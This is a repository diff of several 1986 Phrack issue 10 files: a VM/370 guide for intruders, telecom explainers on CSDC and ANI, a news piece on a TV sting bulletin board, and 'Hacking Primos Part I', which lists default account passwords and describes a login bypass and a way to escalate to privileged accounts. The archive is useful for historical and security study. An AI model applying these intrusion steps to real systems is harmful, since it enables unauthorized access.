they would/wouldn't be a good choice for your long distance needs. And
goodness me, don't use any of this information in an illegal way!

169
phrack10/4.txt Normal file
View file

@ -0,0 +1,169 @@
==Phrack Inc.==
Volume Two, Issue Ten, Phile #4 of 9
A Beginner's Guide to:
The IBM VM/370
(or what to do once you've gotten in)
A monograph by Elric of Imrryr
Presented by Lunatic Labs UnLimted.
KopyRite (K) 1986
RePrint what you like
Note: This file is formatted for printing
on a 80 Column, 55 line printer.
PREFACE: What this guide is about.
This was written to help Hackers learn to basics of how to function on an
IBM VM/370. Not as a guide on how to get in, but on how to use it one
you have gotten in.
Comments on this are welcome at RIPCO 312-528-5020.
Note: To VM/370 Hackers, feel free to add to this file, just give myself
& Lunatic Labs credit for our parts.
PART 1: Logging in & out
When you connect to a VM/370 system hit RETURN till you see:
VM/370
!
To logon you type:
logon userid ('logon' may be abbreviated to 'l')
If you enter an invalid userid, It will respond with a message:
'userid not in cp directory'.
If it is valid you with get:
ENTER PASSWORD:
Enter your password, then your in, hopefully....
Logging Out:
Type:
log
PART 2: Loading CMS & Getting set up
When you logon, if you do not see the message 'VM/SP CMS - (date) (time)
you will need to load 'CMS' (CMS in a command interpreter).
Type:
cp ipl cms
You should then see something like this:
R; T=0.01/0.01 08:05:50
Now you will be able to use both CP & CMS commands...
Some system my think you are using an IBM 3270 Terminal, if you can
emulate a 3270 (for example with Crosstalk) do so, if not type:
set terminal typewriter or set terminal dumb
PART 3: Files
You can list your files by typing:
filelist
Wildcards can be used, so:
filelist t*
list all files beginning with a 't'.
Filenames are made up of a FILENAME and FILETYPE
You can list a file by typing:
listfile filename filetype
Other file commands are: copyfile, erase, and rename, they all work with
FILENAME FILETYPE.
PART 4: Editing your files
I'm going to keep this down to the basics and only discuss one editor
XEDIT. To use XEDIT type:
xedit filename filetype
Once in XEDIT, enter the command 'input' to enter text, hit a RETURN on
a blank line to return to command mode, then enter the command 'FILE' to
save your file.
PART 5: Communicating with others on the system
Sending & receiving 'NOTES':
To send a 'NOTE' to another user type:
note userid
You will then be in the XEDIT subsystem, see PART 4.
Once you are done writing your NOTE, save the file and type:
send note
This will send the NOTE to userid.
You can also use the SEND command to send other files by typing:
send filename filetype userid.
Sending messages:
You can use the TELL command to communicate with a user who is current
logged on, type:
tell userid Help me!
PART 6: Getting Help
Type:
help
That's it, good luck.

229
phrack10/5.txt Normal file
View file

@ -0,0 +1,229 @@
==Phrack Inc.==
Volume Two, Issue Ten, Phile #5 of 9
^ ^
[<+>] [<+>]
/|-|\ /|-|\
\|P|/>/>/>/>/>/>/>/>/>PLP<\<\<\<\<\<\<\<\<\|P|/
|h| ^ ^ |h|
|a| ]+[The Executioner]+[ |a|
|n| |n|
|t| Call Phreak Klass, Room 2600 |t|
|o| [806][799][0016] |o|
|m| |m|
|s| [Circuit Switched Digital Capability] |s|
|-| ----------------------------------- |-|
|S| |S|
|e| Part I of II in this series of files |e|
|x| |x|
|y| Written for PHRACK, Issue 10. |y|
/|-|\ /|-|\
\|$|/>/>/>/>/>/>/>/>/>PLP<\<\<\<\<\<\<\<\<\|$|/
[<+>] [<+>]
========
=Part I=
========
The Circuit Switch Digital Capability (CSDC) allows for the end to end digital
transmission of 56 kilobits per second (kb/s) data and, alternately, the
transmission of analog voice signals on a circuit switched basis.
=====================
=Network Perspective=
=====================
The CSDC feature was formerly known as PSDC (Public Switched Digital
Capability). These two terms can be used synonymously. The CSDC feature
provides an alternate voice/data capability. If a SLC Carrier System 96 is
used, digital signals are transmitted by T1 signal. If the loop is a two wire
loop, the CSDC feature utilizes time compression multi-plexing (TCM) which
allows for the transmission of digital signals over a common path using a
separate time interval for each direction. During a CSDC call an end user may
alternate between the voice and data modes as many times as desired. The CSDC
feature can support sub-variable data rates from customer premises equipment,
but a 56 kb/s rate is utilized in the network. Some possible applications of
the CSDC feature are:
1. Audiographic Teleconferencing.
2. Secure Voice.
3. Facsimile.
4. Bulk Data.
5. Slow scan television.
The ESS switch provides end user access and performs signalling, switching,
and trunking functions between the serving ESS switch and other CSDC offices.
End users of CSDC require a network channel terminating equipment circuit
(NCTE) which is the SD-3C476 or its equivalent. End user access is over 2-wire
metallic loops terminating at the metallic facility terminal (MFT) or SLC
Carrier System. End users not served directly by a direct CSDC ESS office, can
access CSDC equipment through a RX (Remote Exchange) access arrangement via
use of a D4 Carrier System and if required, a SLC Carrier System. The
T-Carrier trunks serve for short haul transmissions while long haul
transmissions are served by digital microwave radio and other digital systems.
If the NCTE interface is used with customer premises equipment, a miniature
8-position series jack is used to connect the NCTE to other equipment. The
jack pins are paired off; data transmit pair, data receive pair, a voice pair,
and a mode switch pair. The data pairs support the simultaneous transmission
and reception of digital data in a bipolar format at 56 kb/s. The data pairs
also provide for the xmission of control information to and from the network.
The voice pairs supports analog signal transmission and provides for call
setup, disconnect and ringing functions. The mode control pair provides
signals to the network when a change in mode (voice to data/data to voice) is
requested by the customer.
A CSDC call is originated over a 2-wire loop which can also be used for
Message Telecommunication Service (MTS) calls. Lines may be marked (MTS/CSDC
or CSDC only). Touch tone is needed to originate a CSDC call. Originations may
be initiated manually or with Automatic Calling Equipment (ACE) if available.
Digit reception, transmission and signalling follow the same procedures used
for a MTS outgoing call on CCIS or non-CCIS trunks. However CSDC calls are
ALWAYS routed over digital transmission facilities.
The long term plan also allows for EA-MF (Equal Access-Multi Frequency)
signalling and improved automatic message accounting (AMA) records. A CSDC
call is screened to ensure that the originating party has CSDC service and
that the carrier to be used provides 56 kb/s voice/data capability. A blocked
call is routed to a special service error announcement. Non-CSDC calls are not
allowed to route over CSDC-only carriers. Non-payer screening is not allowed
for CSDC calls using CCIS signalling.
A CSDC call is routed directed to the carrier or indirectly via the Access
Tandem (AT) or Signal Conversion Point (SCP). The call is terminated directly
from the carrier to the end office or indirectly via the AT or SCP. Signalling
for direct routing is either CCIS or EA-MF and is assigned on a trunk group
basis.
The AT is an ESS switch which allows access to carriers from an end office
without requiring direct trunks. Signalling between end offices and the AT is
either EA-MF or CCIS. Trunks groups using EA-MF signalling can have combined
carrier traffic. Separate trunk groups for each carrier are required for CCIS
signalling.
The SCP is an ESS switch which allows access to carriers using only CCIS
signalling from offices without the CCIS capability. Separate trunk groups for
each carrier are used between the originating end office and the SCP. Separate
trunk groups are optional between the SCP and the terminating end office and
the terminating end office. Signalling between the end office and the SCP is
MF. The SCP must have direct connection to the carrier using CCIS signalling.
=========================
=Remote Switching System=
=========================
The RSS can be used as a remote access point for CSDC. The compatibility of
RSS and CSDC improves the marketability of both features. The RSS design
allows a provision for the support of D4 special service channel bank
plug-ins. This provision allows for such applications as off premises
extensions, foreign exchanges lines, and private lines. Thus the RSS can be
used as a CSDC access point in a configuration similar to the CSDC RX
arrangement.
================
=Centrex/ESSX-1=
================
The CSDC feature is optionally available to Centrex/ESSX-1 customers. Most of
the capabilities of Centrex service can be applied to Centrex lines that have
been assigned the CSDC feature. In voice mode, the Centrex/CSDC line can
exercise any of the Centrex group features that have been assigned to the
line. In the voice/data mode, several Centrex features are inoperable or
operate only on certain calls. The CSDC feature can be provided for a Centrex
group as follows:
1. Message Network Basis (MTS)
2. IntraCentrex group basis
3. InterCentrex group basis
4. Any combination of the above
===============================
=User Perspective for the CSDC=
===============================
To establish a CSDC call, a CSDC user goes off hook, receives dial tone and
dials. The dialing format for the CSDC/MTS is as follows for interim plan:
#99 AB (1+) 7 or 10 digits (#)
The customer dials '#99' to access the CSDC feature. The 'AB' digits are the
carrier designation code. No dial tone is returned after the 'AB' digits. The
1+ prior to the 7 or 10 digit directory number must be used if it is required
for MTS calls. The '#' at the end is optional, if it is not dialed, end of
dialing is signalled by a time-out.
The long term dialing format for the CSDC/MTS is as follows:
#56 (10XXX) (1+) 7 or 10 digits (#)
Dialing '#56' indicates 56kb/s alternate voice/data transmission. the '10XXX'
identifies the carrier to be used for the call. If '10XXX' is not dialed on an
inter-LATA call, the primary carrier of the subscriber is used. If '10XXX' is
not dialed on an intra-LATA call, the telco handles the call. The long term
plan also allows for several abbreviated forms. Dialing '#56 10XXX #' is
allowed for routing a call which prompts the customer to dial according to the
carrier dialing plan. Dialing '#56 10XXX' followed by a speed call is also
allowed. If a customer has pre-subscribed to a carrier which can carry CSDC
calls and the CSDC access code is stored as part of the speed calling number,
the customer dials the speed calling code to make a CSDC call.
Regular ringing is applied to the called line and audible ringing is applied
to the calling terminal. Once the voice connection is established, either
party can initiate the switch to data mode, if desired. To initiate a change
in mode a CSDC user must initiate a mode switch command via a closure of the NCT
An example of a mode switch:
Suppose party A wants to switch to data. Party A issues a mode switch
command and receives a signal called far end voice (FEV) which is a bipolar
sequence (2031 hz at 60 ipm). Party A may now hang up the handset at any time
after initiating the mode switch command. Party B receives a far end data
(FED) tone (2031 Hz at 39 ipm) indicating party A wants to switch to data. If
party B agrees to switch to data, party B must initiate a mode switch command.
Party B may nor hang up the handset. Data transmission is now possible.
To switch to the voice mode, anyone can initiate it. To switch, party A
would pick up the handset and initiate a mode switch command and will receive
the FED tone. Party B receives the FEV tone indicating that party A wants to
go voice. Party B must now pick up the hand set and initiate a mode switch
command. To terminate a call, either party may just leave the handset on and
indicate a mode switch. If termination is issued during a mode conflict, time
out will disconnect the call, usually about 10 or 11 seconds.
Centrex/ESSX-1 customers may utilize the CSDC service in several ways if they
have CSDC terminals with the necessary on premises equipment. The standard
CSDC call is initiated by dialing the message network access code, (9). The
dialing sequence is then identical to the plan for MTS:
#99 AB (1+) 7 or 10 digits (interim plan)
#56 (10XXX) (1+) 7 or 10 digits (#) (long term plan)
The dialing pattern to establish interCentrex or intraCentrex CSDC calls is as
follows:
CSDC access code + extension
An intraCentrex/CSDC call is initiated by dialing the trunk access code
assigned to route a loop-around Centrex/CSDC trunk group. Next, the extension
of the desired station is dialed. To establish an interCentrex call a
different trunk access code must be used to route the CSDC calls to another
Centrex group instead of a station.
The CSDC maintenance circuit has a dialable digital loopback. This loopback is
very useful in CSDC testing. A customer can check their access line by dialing
the test DN. The loop is automatically activated when the call is answered.
================
=End of Part I.=
================
Part II: The CSDC hardware, and office data structures.
=======================================================
= (c) 1986 The Executioner and The PhoneLine Phantoms =
=======================================================

327
phrack10/6.txt Normal file
View file

@ -0,0 +1,327 @@
==Phrack Inc.==
Volume Two, Issue Ten, Phile #6 of 9
-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-
! !
# Hacking Primos Part I #
! !
# By Evil Jay #
! !
# Phone Phreakers of America #
! !
# (C) 1986-87 #
! !
-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-
Author Note:
I should begin by saying that there are other files out there about hacking
Primos, one written recently, that basically tell you nothing at all as far as
in-depth Primos is concerned. Those files should be deleted and this put in
its place. This is the first in many files on Primos, and I will go into many
topics, such as the on-line network, the different subsystems and other
subjects. Hope you enjoy!
*** Gaining Entry Part 1 ***
Gaining entry, as always, is the hardest part.
When you call a Primos system it will connect with something like this:
PRIMENET 19.2.7F PPOA1
If it doesn't give a welcome msg like above trying typing something like
"XXZZZUUU" and hit return and it should come back with:
Invalid command "XXZZZUUU". (logo$cp)
Login please.
ER!
To login you type:
LOGIN <USER ID> <RETURN/ENTER>
Or Just:
LOGIN <RETURN/ENTER>
(Then it will ask for your "User ID?")
User ids differ from system to system but there are ALWAYS default accounts to
try. For "User ID?" try...
SYSTEM (This is the operators account and with it you can usually do
anything.)
LIB
DOS
After you enter your User ID it will prompt you with:
Password?
This is of course, where you enter your password. For SYSTEM try...
SYSTEM
SYSMAN
NETLINK
PRIMENET
MANAGER
OPERATOR
And anything else you can think of. These are just common passwords to these
defaults.
For LIB try...
LIBRARY
SYSLIB
LIB
SYSTEM
For DOS try...
DOS
SYSDOS
SYSTEM
Etc...Just use your brain.
*Older Versions*
On older versions of Primos, 18 and below, you could enter one of the system
defaults above and hit CTRL-C once or twice for the password and it would drop
you into the system. Whether this is a bug or intentional I don't really have
any idea. But it does work sometimes. To see what ver of Primos your trying to
logon to just look at the welcome message when you logon:
PRIMENET 19.2.7F PPOA1
19 is the version number. So thus, if you were logging on to this particular
Prime you would NOT be able to use the above mentioned bug/default-password.
By the way, if you do not know what version it is (because it did not give you
a welcome msg when you connected...try to do the above mentioned anyway.)
Now, if it says:
Invalid user id or password; please try again.
Then you must try a different password. Notice, that the system informs you
that either the User ID, the password or both are wrong. Don't worry about
this...just hack the defaults. There have been a lot of rumors spreading
around about common defaults such as: PHANTOM, PRIMOS, PRIME & FAM, but I
believe this to be a load of shit. I have never seen a system with these
defaults on them. But, as far as PRIMOS and PRIME go, these are sometimes
common accounts but I really don't believe that they are defaults. Also try
accounts like DEMO & GUEST. These are sometimes common accounts (but never
very often).
Primos does not have limited commands before logon such as Tops 20 and DEC. So
hacking a Primos is really nothing but taking a guess.
** No passwords **
Some users have been known to use a carriage return for their password which
in other words means, once you enter your user id, your logged in without
having to enter a password. Sometimes, these are default passwords assigned by
the system operator, but that is rare. If you can get the format (perhaps you
already have any account) for the regular user id's, then try passwords like:
NETLINK
SYSTEM
PRIME
PRIMENET
PRIMOS
And other typical user passwords like sex, hot, love...etc. Most female users
that I have talked to on a local university prime all seem to have picked
account that have something to do with sex...sex being the most popular.
** The Format **
The format for a user id can be just about ANYTHING the operators or system
owners want...and they are usually random looking things that make no sense.
They can be a combination of numbers, numbers and I am almost sure CTRL
characters can be used. Lower & Upper case do not matter...the system, changes
all lower case entry to upper case. Passwords can be anything up to 16
characters in length.
** Your In! **
If you get a valid ID/Password you will see something like this:
PPOA1 (user 39) logged in Monday, 15 Dec 86 02:29:16.
Welcome to PRIMOS version 19.4.9.
Last login Friday, 12 Dec 86 08:29:04.
Congratulate yourself, you just did something that should be called something
of an achievement!
The next part will deal with very basic commands for beginners. I would like
to end this part with a few more words. Yes, Primos is hard to hack, but given
the time and patience almost every system has those basic demo accounts and
CAN be hacked. Most hackers tend to stay away from Primes, little knowing that
Primos is a system that is very entertaining and certainly kept me up late
hours of the night. Have fun and keep on hacking. If you have any questions or
comments, or I have made some sort of error, by all means get in touch with me
at whatever system you have seen me on...
** Now For The Good Shit **
This part was originally going to be a beginners introduction to commands on a
Primos system. Instead I decided to write a part which should help ANYONE with
a low level account gain system access. I would also like to thank PHRACK Inc.
on the wonderful job they are doing...without PHRACK I don't really know for
sure how I would have distributed my files. Oh yes, I know of all the other
newsletters and the like, but with PHRACK it was only a matter of getting a
hold of one of the people in charge, which is a simple matter since their
mailbox number is widely known to the hack/phreak community. I would also like
to encourage boards of this nature to support PHRACK fully, and I would also
like to congratulate you guys, once again, for the great job your doing. Now,
on with the file.
** Stuff You Should Know **
The explanation I am going to (try to) explain will NOT work all the time...
probably 60% of the time. Since I discovered this, or at least was the first
to put it in "print" I would at least ask those system operators out there to
keep my credits and the credits of my group in this file.
** Some More Stuff **
First, this is not exactly a "novice"-friendly file. You should be familiar
with the ATTACH and SLIST commands before proceeding. They are quite easy to
learn, and it is really not required to use this file, but just the same,
these are important commands in learning the Primos system so you should at
least be familiar with them. To get help on them type:
HELP SLIST
or
HELP ATTACH
You should also play with the commands until you know all of their uses.
** Okay, Here We Go **
This file is not going to explain everything I do. I'm just going to show you
how to get SYS1 privileged accounts.
First, log on to your low access account.
Type:
ATTACH MFD
Then get a DIR using:
LD
Okay, your now seeing a dir with a lot of sub-directories. The only files that
should be in the main directory (most of the time) are BOOT and SYS1. Ignore
these...look for a file called CCUTIL or something with the word UTILITY or
UTIL or UTILITIES...something that looks like UTILITY...
Okay, ATTACH to that directory with:
ATTACH <NAME OF DIRECTORY>
Now, do an LD again and look at the files. Now, here is the part that is
really random. Since not every PRIME system will have the same UTILITY
programs, just look at any that have an extension ".CPL". There might be one
called USRLST.CPL. Type:
SLIST USRLST <NO NEED TO TYPE ".CPL" AT THE END.>
Okay, it should be printing a whole bunch of bullshit. Now in this program
there SHOULD be a line that looks like the following:
A CCUTIL X
Now, CCUTIL is the name of the dir you are on so I have to point out that
CCUTIL WILL NOT ALWAYS BE THE NAME OF THAT UTILITY DIRECTORY. So if the name
of the UTILITY directory you are on is called UTILITY then the line will look
like this:
A UTILITY X
Now, the X is the PASSWORD OF THAT DIRECTORY. AGAIN, IT CAN BE ANYTHING. The
password may be UTILITY which means it will look like this:
A UTILITY UTILITY
Or the password may be SECRET. So:
A UTILITY SECRET
Pat yourself on the ass...you know have SYS1 access. Log back in with the
LOGIN command (or if it doesn't work just LOGOUT and LOGIN again). Enter
UTILITY or CCUTIL (or WHATEVER THE NAME OF THE DIRECTORY WAS) as the user id.
Then for the password just enter the password. If this doesn't work, then what
you will have to do is try out other sub-directories from the MFD directory.
Then SLIST other programs with the extension. In one of my other PRIME files I
will fully explain what I have just done and other ways to get the
directories/ids password.
Now, if you don't see any line in the program like:
S <NAME OF DIR> <PASSWORD>
Then list other programs in the utility program or try other directories. I
have gained SYS1 access like this 60% of them time. And NOT ALWAYS ON THE
UTILITY DIRECTORY.
That is about it for this file. Stay tuned for a future PHRACK issue with
another PRIME file from me. If I don't change my mind again, the next file
will deal with basic commands for beginners.
-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-
! !
# This Has Been An: #
! !
# Evil Jay Presentation #
! !
# Phone Phreaks of America #
! !
# (C) 1986-87 #
! !
-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-

170
phrack10/7.txt Normal file
View file

@ -0,0 +1,170 @@
==Phrack Inc.==
Volume Two, Issue Ten, Phile #7 of 9
Automatic Number Idenfification
Written by Doom Prophet and Phantom Phreaker
Automatic Number Identification (ANI) is nothing more than automatic means
for immediately identifying the Directory Number of a calling subscriber. This
process made it possible to utilize CAMA* (Centralized Automatic Message
Accounting) systems in SxS, Panel, and Xbar #1 offices.
The identity of the calling line is determined by ANI circuits installed
in the types of CO's mentioned above. Xbar#5 offices have their own AMA
(Automatic Message Accounting) equipment and utilize an AMA translator for
automatically identifying the calling line.
Before ANI was developed, each subscriber line (also called a local loop)
had a mechanical marking device that kept track of toll charges. These devices
were manually photographed at the end of the billing period and the amount of
the subscribers bill was determined from that. This process was time
consuming, so a new system (ANI) was developed.
The major components of the ANI system used in SxS and Crossbar #1 are:
Directory number network and bus arrangement* for connecting the sleeve(the
lead that is added to the R(ing) and T(ip) wires of a cable pair at the MDF*
(Main Distribution Frame));
A lead of each line number through an identifier connector to the identifier
circuit;
Outpulser and Identifier connector circuit to seize an idle Identifier;
Identifier circuit to ascertain the calling party's number and send it to the
outpulser for subsequent transmission through the outpulser link to the ANI
outgoing trunk;
An ANI outgoing trunk to a Tandem office equipped with a CAMA system.
The following is a synopsis of the ANI operations with respect to a toll
call through a #1Xbar office. The call is handled in the normal manner by the
CO equipment and is routed through an ANI outgoing trunk to a Tandem office.
The identification process starts as soon as all digits of the called number
are received by the CAMA sender in the Tandem office and when the district
junctor in the Xbar office advances to its cut-through position (a position of
the connecting circuits or paths between the line-link and trunk-link frames
in the CO).
Upon receiving the start identification signal from the CAMA equipment,
the ANI outgoing trunk (OGT) establishes a connection through an outpulser
link to an idle outpulser circuit. An idle identifier is then seized by the
outpulser circuit through an internal Identifier connector unit. Then the
identifier through the connector unit connects to the directory number network
and bus system.
At the same time, the identifier will signal the ANI trunk to apply a
5800Hz identification tone to the sleeve lead of the ANI trunk. The tone is
transmitted at a two-volt level over the S lead paths through the directory
number network and bus system. It will be attenuated or decreased to the
microvolt range by the time the identifier circuit is reached, necessitating
a 120dB voltage amplification by the amplifier detector equipment in the
identifier to insure proper digit identification and registration operations.
A single ANI installation can serve as many as six CO's in a multi-office
building. The identifier starts its search for the calling line number by
testing or scanning successively the thousands secondary buses of each CO.
When the 5800Hz signal is detected, the identifier grounds corresponding leads
to the outpulser, to first register the digit of the calling office and then
the thousands digit of the calling subscriber's number. The outpulser
immediately translates the digit representing the calling office code into its
own corresponding three digit office code. The identifier continues its
scanning process successively on the groups of hundreds, tens, and units
secondary buses in the calling office, and the identified digits of the
calling number are also registered and translated in the outpulser's relay
equipment for transmission to the tandem office.
The outpulser is equipped with checking and timing features to promptly detect
and record troubles encountered (This process may be responsible for some of
the cards found while trashing). Upon completion of the scanning process, it
releases the identifier and proceeds to outpulse in MF tones the complete
calling subscriber's number to the CAMA equipment in the tandem office in the
format of KP+X+PRE+SUFF+ST where the X is an information digit. The
information digits are as follows:
0-Automatic Identification (normal) 1-Operator Identification (ONI)*
2-Identification Failure (ANIF)*
(There is also other types of outpulsing of ANI information if the calling
line has some sort of restriction on it).
When all digits have been transmitted and the ANI trunk is cut-through for
talking, the outpulser releases.
In the tandem office, the calling party's number is recorded on tape in
the CAMA equipment together with other data required for billing purposes.
This information, including the time of when the called station answered and
the time of disconnect, goes on AMA tapes.
The tapes themselves are usually standard reel to reel magnetic tape, and are
sent to the Revenue Accounting Office or RAO at the end of the billing period.
So, to sum the entire ANI process up:
The toll call is made. The CO routes the call through ANI trunks where an idle
identifier is seized which then connects to the directory number network and
bus system while signalling the ANI trunk to apply the needed 5800Hz tone to
the Sleeve. The identifier begins a scanning process and determines the
calling office number and the digits of the calling subscriber's number, which
is sent by way of the outpulser in MF tones to the CAMA equipment in the
tandem office. The call information is recorded onto AMA tapes and used to
determine billing.
Note that your number does show up on the AMA tape, if the circumstances
are correct, (any toll call, whether it is from a message-rate line or from a
flat-rate line). However, the AMA tapes do not record the calling line number
in any separated format. They are recorded on a first-come, first-serve basis.
Misc. Footnotes (denoted by an asterisk in the main article)
---------------
* ANIF-Automatic Number Identification Failure. This is when the ANI equipment
does not work properly, and could occur due to a wide variety of technical-
ities. When ANIF occurs, something called ONI (Operator Number Identification)
is used. The call is forwarded to a TSPS operator who requests the calling
line number by saying something similar to 'What number are you calling from?'
* CAMA-Centralized Automatic Message Accounting. CAMA is a system that records
call details for billing purposes. CAMA is used from a centralized location,
usually a Tandem office. CAMA is usually used to serve class 5 End Offices in
a rural area near a large city which contains a Tandem or Toll Office. CAMA is
similar to LAMA, except LAMA is localized in a specific CO and CAMA is not.
* The Directory Number Network and bus system is a network involved with the
ANI process. It is a grid of vertical and horizontal buses, grouped and class-
ified as Primary or Secondary. There are 100 vertical and 100 horizontal buses
in the Primary system. In the Secondary system, there are two sub-groups:Bus
system #1 and Bus system #2, both of which have ten horizontal and vertical
buses. These buses as a whole are linked to the Identifier in the ANI trunk
and are responsible for identifying tens, hundreds, thousands and units digits
of the calling number (After the Identifier begins its scanning process).
* MDF-Main Distribution Frame. This is the area where all cable pairs of a
certain office meet, and a third wire, the Sleeve wire, is added. The Sleeve
wire is what is used in gathering ANI information, as well as determining a
called lines status (off/on hook) in certain switching systems by presence of
voltage. (voltage present on Sleeve, line is busy, no voltage, line is idle.)
* ONI-Operator Number Identification. See ANIF footnote.
NOTE: There are also other forms of Automatic Message Accounting, such as LAMA
(Local Automatic Message Accounting). LAMA is used in the class 5 End Office
as opposed to CAMA in a Toll Office. If your End Office had LAMA, then the ANI
information would be recorded at the local level and sent from there. The LAMA
arrangement may be computerized, in which it would denoted with a C included
(LAMA-C or C-LAMA).
References and acknowledgements
-------------------------------
Basic Telephone Switching Systems (Second Edition) by David Talley
Understanding Telephone Electronics by Radio Shack/Texas Instruments
Other sysops are allowed to use this file on their systems as long as none of
it is altered in any way.
-End of file-
Jul 12 1986

392
phrack10/8.txt Normal file
View file

@ -0,0 +1,392 @@
==Phrack Inc.==
Volume Two, Issue Ten, Phile #8 of 9
PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
PWN PWN
PWN <-=*} Phrack World News {*=-> PWN
PWN PWN
PWN Issue IX/Part One PWN
PWN PWN
PWN Compiled, Written, and Edited by PWN
PWN PWN
PWN Knight Lightning PWN
PWN PWN
PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
In PWN Issue Seven/Part One, we had an article entitled "Maxfield Strikes
Again." It was about a system known as "THE BOARD" in the Detroit 313 NPA.
The number was 313-592-4143 and the newuser password was "HEL-N555,ELITE,3"
(then return). It was kind of unique because it was run off of an HP2000
computer. On August 20, 1986 the following message was seen on "THE BOARD."
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Welcome to MIKE WENDLAND'S I-TEAM sting board!
(Computer Services Provided By BOARDSCAN)
66 Megabytes Strong
300/1200 baud - 24 hours.
Three (3) lines = no busy signals!
Rotary hunting on 313-534-0400.
Board: General Information & BBS's
Message: 41
Title: YOU'VE BEEN HAD!!!
To: ALL
From: HIGH TECH
Posted: 8/20/86 @ 12.08 hours
Greetings:
You are now on THE BOARD, a "sting" BBS operated by MIKE WENDLAND of the
WDIV-TV I-Team. The purpose? To demonstrate and document the extent of
criminal and potentially illegal hacking and telephone fraud activity by the
so-called "hacking community."
Thanks for your cooperation. In the past month and a half, we've received all
sorts of information from you implicating many of you to credit card fraud,
telephone billing fraud, vandalism, and possible break-ins to government or
public safety computers. And the beauty of this is we have your posts, your
E-Mail and--- most importantly ---your REAL names and addresses.
What are we going to do with it? Stay tuned to News 4. I plan a special
series of reports about our experiences with THE BOARD, which saw users check
in from coast-to-coast and Canada, users ranging in age from 12 to 48. For our
regular users, I have been known as High Tech, among other ID's. John Maxfield
of Boardscan served as our consultant and provided the HP2000 that this "sting"
ran on. Through call forwarding and other conveniences made possible by
telephone technology, the BBS operated remotely here in the Detroit area.
When will our reports be ready? In a few weeks. We now will be contacting
many of you directly, talking with law enforcement and security agents from
credit card companies and the telephone services.
It should be a hell of a series. Thanks for your help. And don't bother
trying any harassment. Remember, we've got YOUR real names.
Mike Wendland
The I-team
WDIV, Detroit, MI.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
This then is the result:
Phrack World News proudly presents...
Mike Wendland & the I-Team Investigate
"Electronic Gangsters"
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Carman Harlan: Well we've all heard of computer hackers, those electronic
gangsters who try to break into other people's computer
systems. Tonight on the first of a three part news 4 [WDIV-TV,
Channel 4 in Detroit] extra, Mike Wendland and the I-Team will
investigate how such computer antics jeopardize our privacy.
Mike joins us now to tell us what at first may have been
innocent fun may now be affecting our pocket books.
Mike Wendland: Well Carman and Mort, thanks to the media and movies just about
everyone knows about hackers and phone phreaks. By hooking
their Apples, their Ataris, and their Commodores into telephone
lines these electronic enthusiasts have developed a new form of
communication, the computer bulletin board. There are probably
10,000 of these message swapping boards around the country
today, most are innocent and worthwhile. There are an
estimated 1,000 pirate or hacker boards where the main
activities are electronic trespassing, and crime [Estimates
provided by John Maxfield].
[Clipping From Wargames comes on]
In movies like Wargames computer hackers are portrayed as
innocent hobbyist explorers acting more out of mischief than
malice. But today a new generation of hackers have emerged. A
hacker that uses his knowledge of computers to commit crimes.
Hackers have electronically broken into banks, ripped off
telephone companies for millions of dollars, trafficked in
stolen credit card numbers, and through there network of
computer bulletin boards traded information on everything from
making bombs to causing terrorism.
[Picture of John Maxfield comes on]
John Maxfield: Well, now there are electronic gangsters, not just electronic
explorers they are actually gangsters. These hackers meet
electronically through the phone lines or computer bulletin
boards. They don't meet face to face usually, but it is a
semi-organized gang stile activity, much like a street gang, or
motorcycle gang.
Mike Wendland: John Maxfield of Detroit is America's foremost "Hacker
Tracker". He has worked for the F.B.I. and various other law
enforcement and security organizations. Helping catch dozens
of hackers around the country, who have used their computers
for illegal purposes. To find out how widespread these
electronic gangsters have become, we used John Maxfield as a
consultant to setup a so-called "sting" bulletin board [THE
BOARD].
We wrote and designed a special program that would allow us to
monitor the calls we received and to carefully monitor the
information that was being posted. We called our undercover
operation "The Board", and put the word out on the underground
hacker network that a new bulletin board was in operation for
the "Elite Hacker". Then we sat back and watched the computer
calls roll in.
In all we ran our so called "Sting" board for about a month and
a half, 24 hours a day, 7 days a week. We received literally
hundreds of phone calls from hackers coast to coast, ranging in
age from 17 to 43. All of them though had one thing in common,
they were looking for ways to cheat the system.
The hackers identified themselves by nicknames or handles like
CB radio operators use, calling themselves things like Ax
Murderer, Big Foot, and Captain Magic. They left messages on a
variety of questionable subjects, this hacker for instance told
how to confidentially eavesdrop on drug enforcement radio
conversations. A New York hacker called The Jolter swapped
information on making free long-distance calls through stolen
access codes, and plenty of others offered credit card numbers
to make illegal purchases on someone else's account.
John Maxfield: Well these kids trade these credit card numbers through the
computer bulletin boards much like they'd trade baseball cards
at school. What we've seen in the last few years is a series
of hacker gangs that are run by an adult, sort of the
mastermind who stays in the background and is the one who
fences the merchandise that the kids order with the stolen
credit cards.
Mike Wendland: Then there were the malicious messages that had the potential
to do great harm. The Repo Man from West Virginia left this
message telling hackers precisely how to break into a hospital
computer in the Charleston, WV area.
[Picture of Hospital]
This is where that number rings, the Charleston Area Medical
Center. We immediately notified the hospital that there
computer security had been breached. Through a spokesperson,
the hospital said that a hacker had indeed broken into the
hospital's computer and had altered billing records. They
immediately tightened security and began an investigation.
They caught the hacker who has agreed to make restitution for
the damages. Maxfield says though, "Most such break-ins are
never solved".
John Maxfield: When you are talking about electronic computer intrusion, it's
the perfect crime. It's all done anonymously, it's all done by
wires, there's no foot prints, no finger prints, no blood
stains, no smoking guns, nothing. You may not even know the
system has been penetrated.
Mike Wendland: Our experience with the "Sting" bulletin board came to a sudden
and unexpected end. Our cover was blown when the hackers
somehow obtained confidential telephone company records. The
result a campaign of harassment and threats that raised serious
questions about just how private our supposedly personal
records really are. That part of the story tomorrow. [For a
little more detail about how their cover was "blown" see PWN
Issue 7/Part One, "Maxfield Strikes Again." Heh heh heh heh.]
Mort Crim: So these aren't just kids on a lark anymore, but who are the
hackers?
Mike Wendland: I'd say most of them are teenagers, our investigation has
linked about 50 of them hardcore around this area, but most
very young.
Mort Crim: Far beyond just vandalism!
Mike Wendland: Yep.
